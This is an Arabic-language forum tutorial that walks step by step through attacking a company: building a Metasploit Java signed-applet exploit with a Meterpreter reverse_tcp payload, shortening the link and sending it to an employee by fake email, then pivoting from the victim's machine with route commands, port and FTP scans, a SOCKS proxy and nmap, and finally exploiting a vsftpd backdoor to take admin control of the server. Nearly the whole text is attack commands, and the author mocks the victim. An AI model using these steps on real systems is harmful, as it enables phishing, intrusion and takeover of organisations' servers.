msfconsole
و الان نقوم بتصميم الرسالة التى نرسلها الى الشركة
ues explolt/multi/browser/java_stgned_applet
ونقوم بعمل lhost
show option
و نذهب الى اي موقع لمعرفت الاي بي الخاص بالراوت الشخصي لك مثلا
http://canyouseeme.org/
و بعد ذلك ندخل الاي بي مع امر الادخال
set lhost + your ip
و استخدم بورت موسوق فيه مثلا
443
ثم ادخل الامر
set lport 443
اطلب معرفت الاهداف من خلال الامر شو تارقت
show targets
طبعا هو يستخدم للينكس و الويندز لذلك انا ح احدد الهدف المطلوب
و استخدم الرقم المشير او المحدد للتارقت و ليس اسم التارقت
مثلا
1. windows
2.kali lnuix
3.mac os
3.mac os x x86
فالامر سيكون في حالة استهداف وندوز
set target 1
ثم نحدد الهوست الخاص بالسرفير
set srvhost
و ادخل رقم الاي بي مرفق مع الامر اعلاه فيكون الامر في النهاية هاكذا مثلا
set srvhost 192.168.1.102
ملاحظة لا نستخدم اي بي حقيقي في هذي الخطوة بل هو الاي بي الخاص بالينكس
ثم نقوم بفتح بورت او معبر للسيرفير
set srvport 80
و نقوم بعمل البي لود
set payload windows/neterpreter/reverse_tcp
و نحدد اليو ار اي باس
set URIPATH grope work
و لان نكتب اكس بلويد للتاكد من صحة الاوامر
لو اشتغل معاك خلاص ما اشتغل راجع الاوامر على العموم ستظهر قائمة ناخز الرابط منها وهو الرابط الذي سنقوم بارسالة الى العميل او الضحية المصيطر عليها باستخدام الهندسة الاجتماعية
ملاحظة نقوم بتغير الاي بي الداخل الموجود في الربط باي بي خارجي و الاي بي الخارجي هو الخاص بالراوتر او جهاز الاتصال الخاص بك و نقوم بعمل برورت في الراوتر للاي بي الخاص بالينكس ونختار نفس البورت الاول الهو 443
بعد كدا نختص الرابط باستخدام اي موقع و نقوم بارسال الرابط للموظف من خلال اي مايل وهمي او حقيقي مزيف و انت و درجة الاقناع عندك بس لازم الرسالة تكون مقنعة
بعد ذلك ننتقل الى الرحل التانية من الاوامر
و لان نقوم بمعرفة السيرفرات المتصل بها العميل او الموظف من خلال الامر
netstat
و نقوم باخذ الاي بي الخاص بالسيرفر وهو غالبا مايكون على البورت 21و نقوم بنسخه ثم نخرج من خلال الامر
backgrround
و نعمل راوت من خلال البارتشن الخاص بالموظف المسكين ههههههههههههههههه
route add + ip server+net mask of the server
يعني الامر راوت زايد الاي بي الخاص بالسيرفر والماسك نت وهو 255.255.255.0 والسي شن المستخدم قت وي للراوب و هو 1
و نختبر اذا كان قد اضاف الراوت ام لا من خلال الامر
route print
و لا نستخدم يوزر من خلال الامر التالي
ues auxillary/scanner/portscan/tcp
set RHOST +SERVER IP
set PORT 21
و لان نتحقق من انه يعمل من خلال الامر
run
و الان بعد ان تاكدنا من عمله نريد معرفة نوع السيرفر و كل معلومة عنه
من خلال الماب اسكان و عن طريق الامر التالي
use auxillary/scanner/ftp/ftp_version
و بعد ذلك افتح الخيارات بطريقة عادية
show options
و نحدد الار هوست
set RHOST +SERVER IP
set PORTS 21
run
و كدا معاك نوع السيرفر ولو شايف ان دا مش كفاية ح نستخدم لان ماب
set auxillary/server/socks4a
show options
هنا سنشغل البورك الخاص بالاسكان الخاص بالبروكي سيرقر على 9050 لان البروكسي جينز تعمل على 9050
set SERPORT 9050
run
و نستخدم البروكسي جينز لتشغيل امر الان ماب
nmap -st -sv -n p21 + server ip
searh vsftpd
و سوف تظهر لك اكس بلويد باك دور ماعليك الا اضافة الامر use اليها و بعد ذلك
set HOST + ip server
set RPORT 21
exploit
و كدا تقدر تعمل اي شئ على السيرفر و مبروك انت ادمين

تحويل كودإخفاء محول الأكواد الإبتساماتإخفاء